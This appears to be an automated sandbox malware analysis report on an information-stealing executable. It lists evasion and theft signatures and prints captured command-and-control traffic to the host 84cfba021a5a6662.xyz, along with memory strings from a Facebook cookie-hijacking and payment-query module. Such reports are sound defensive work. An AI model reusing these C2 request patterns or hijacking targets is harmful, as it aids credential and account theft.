Analysis Report N1yprTBBXs

Overview

General Information

Sample Name: N1yprTBBXs (renamed file extension from none to exe)
Analysis ID: 346123
MD5: f7d7c89f3f5cbc925480b46b7b934157
SHA1: 73e389b70cf3d8975ccbaf7d04f4c45cc80be860
SHA256: 2870f899f2e9ec540da321f603cfb1a735dcd06df016718e663dc78fefdf5e0a

Most interesting Screenshot:

Detection

Score: 93
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Metadefender: Detection: 18% Perma Link
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe ReversingLabs: Detection: 59%
Multi AV Scanner detection for submitted file
Source: N1yprTBBXs.exe Virustotal: Detection: 38% Perma Link
Source: N1yprTBBXs.exe Metadefender: Detection: 18% Perma Link
Source: N1yprTBBXs.exe ReversingLabs: Detection: 59%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: N1yprTBBXs.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004C24B0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash, 1_2_004C24B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00463680 _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_00463680
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey, 1_2_00456840
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0045C870 CryptQueryObject,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore, 1_2_0045C870
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 3_2_1001F720

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Unpacked PE file: 1.2.N1yprTBBXs.exe.2840000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Unpacked PE file: 3.2.6272167835D47591.exe.2810000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Unpacked PE file: 5.2.6272167835D47591.exe.2850000.5.unpack
Uses 32bit PE files
Source: N1yprTBBXs.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: N1yprTBBXs.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611969895131.exe, 0000000A.00000000.264783282.000000000040F000.00000002.00020000.sdmp, 1611969895131.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000017.00000000.290207974.0000000000DBC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.1.dr

Spreading:

barindex
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: c: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a: Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose, 1_2_00410120
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW, 1_2_00413360
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001A170 FindFirstFileA,FindClose, 3_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior

Networking:

barindex
Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00454060 WaitForSingleObject,HttpOpenRequestW,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,_memmove,InternetCloseHandle,InternetCloseHandle, 1_2_00454060
Source: global traffic HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000005.00000003.267372785.0000000004147000.00000004.00000001.sdmp String found in binary or memory: 13245950599128816","lastpingday":"13245947458518717","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale":"en","description":"","icons":{"128":"128.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDC/HotmFlyuz5FaHaIbVBhhL4BwbcUtsfWwzgUMpZt5ZsLB2nW/Y5xwNkkPANYGdVsJkT2GPpRRIKBO5QiJ7jPMa3EZtcZHpkygBlQLSjMhdrAKevpKgIl6YTkwzNvExY6rzVDzeE9zqnIs33eppY4S5QcoALMxuSWlMKqgFQjHQIDAQAB","manifest_version":2,"name":"YouTube","update_url":"http://clients2.google.com/service/update2/crx","version":"4.2.8"},"page_ordinal":"n","path":"blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0","preferences":{},"regular_only_preferences":{},"state":1,"was_installed_by_default":true,"was_installed_by_oem":false},"felcaaldnbdncclmgdcncolpebgiejap":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"yn","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245950595726800","lastpingday":"13245947458518717","location":1,"manifest":{"api_console_project_id":"1083656409722","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit spreadsheets","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC0AHrkP4MHPDKQI/O9LqZjtM24hKApaT3uVHeOduC06ZXWuwVRvx2wy5JUmMHfefXRG26tErgZSWpbxkm+2xfplKnT+grXF771HDgsNrNXERJHq7tnoYsWRiG3Gbs5BI4Ei+naZ/nyiWblbT4GyuD9N5yXNtoM0AnK+0FYhbO7IwIDAQAB","manifest_version":2,"name":"Sheets","offline_enabled":true,"update_url":"https://clients2.google.com/service/update2/crx","version":"1.2"},"page_ordinal":"n","path":"felcaaldnbdncclmgdcncolpebgiejap\\1.2_0","preferences":{},"regular_only_preferences":{},"state":1,"was_installed_by_default":true,"was_installed_by_oem":false,"withholding_permissions":false},"gfdkimpbcpahaombhbimeihdjnejgicl":{"active_permissions":{"api":["feedbackPrivate"],"explicit_host":["chrome://resources/*"],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":["feedbackPrivate.onFeedbackRequested"],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245950583264218","location":5,"manifest":{"app":{"background":{"scripts":["js/event_handler.js"]},"content_security_policy":"default-src 'none'; script-src 'self' blob: filesystem: chrome://resources; style-src 'unsafe-inline' blob: chrome: file: filesystem: data: *; img-src * blob: chrome: file: filesystem: data:; media-src 'self' blob: filesystem:"},"description":"Send feedback to Google","display_in_launcher":false,"display_in_new_tab_page":false,"icons":{"192":"images/icon192
Source: 6272167835D47591.exe String found in binary or memory: _time":"13245950599128816","lastpingday":"13245947458518717","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: 